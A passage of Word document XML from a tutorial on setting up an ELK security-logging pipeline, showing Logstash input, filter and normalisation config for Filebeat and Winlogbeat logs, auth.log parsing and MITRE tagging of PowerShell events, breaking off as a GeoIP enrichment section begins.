    <w:p w14:paraId="7E936CB1" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">   • Parse → ECS fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BDC81F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">   • Normalize values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B336FD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">   • Enrich with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> / Threat-Intel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5146C7" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">          ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221502FB" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    Elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2023FD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">          ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B115B5B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">       Kibana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EA7F9D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Each pipeline has three sections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762E5D6F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>input   { beats { port =&gt; 5044 } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC35C63" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>filter  { ...process, parse, enrich... }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC45EA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">output  { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> { … } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D2F6E8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="26FBEB18">
          <v:rect id="_x0000_i1086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6556CE0A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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.2 Create a structured Logstash pipeline folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B3278" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Inside your ELK setup (docker-elk/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/pipeline/ or /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>conf.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C0174" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>05-normalization.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B10B382" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>05-enrichment.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC33912" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>05-output.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E71663E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>You can merge all into one file, but modular helps clarity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6C3848" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="2976CA84">
          <v:rect id="_x0000_i1087" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B8013E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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.3 Example base pipeline (for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F146E41" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>input {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD69F6F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  beats {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAF4DDA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    port =&gt; 5044</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A66A8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7651194A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2044190E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538"/>
    <w:p w14:paraId="6F81FA96" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687737CA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  ########################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A41E6B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  # 1️</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Identify source type (Windows vs Linux vs Suricata)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732FC722" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  ########################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF76282" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  if [agent][type] == "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8AD225" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    mutate { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>add_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>event.source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" =&gt; "windows" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BACA2C5" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  } else if [agent][type] == "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED246D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    mutate { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>add_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>event.source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" =&gt; "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9B40AA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  } else if [agent][type] == "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0C9624" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    mutate { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>add_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>event.source</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" =&gt; "network" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE8E1DC" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2D7548" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538"/>
    <w:p w14:paraId="53F94C7B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  ########################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7F84E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  # 2️</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Normalize timestamps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFD9836" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  ########################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C51B38" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  date {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB217C0" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    match =&gt; ["@timestamp", "ISO8601"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E45E384" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    target =&gt; "@timestamp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A35EC5D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B9621B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538"/>
    <w:p w14:paraId="6FF59A18" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  ########################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C258753" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  # 3️</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Parse raw message fields (example: auth.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C557B1" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  ########################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC1E14A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  if [log][file][path] =~ "auth.log" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ECB25E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    grok {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E839BDD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      match =&gt; { "message" =&gt; "%{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>SYSLOGTIMESTAMP:sys_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>} %{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>HOSTNAME:host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>} %{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>WORD:process</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>}\[%{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>NUMBER:pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>}\]: %{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>GREEDYDATA:auth_message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>}" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FF2D59" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7B94C8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    mutate {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0907BA9D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      rename =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>auth_message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" =&gt; "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>event.message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088ED98D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>add_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>event.module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" =&gt; "auth" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3CB8C2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1388CFB5" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02951585" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538"/>
    <w:p w14:paraId="2C673CB9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  ########################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9161E6" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  # 4️</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Example PowerShell parsing (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5765731E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  ########################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FE3970" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  if [event][provider] == "Microsoft-Windows-PowerShell" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EE5AF9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    mutate {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B24E1C4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>add_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>mitre.technique</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" =&gt; "T1059.001" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F5F7D7" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5731D290" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67C7E3" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C26AF" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="4D43F8C7">
          <v:rect id="_x0000_i1088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D14CB89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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.4 Add Enrichment Plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D116F2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🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GeoIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (for public IPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6A0E88" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Installs the free GeoLite2 database and adds country/city info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC339D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3714D2B5" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
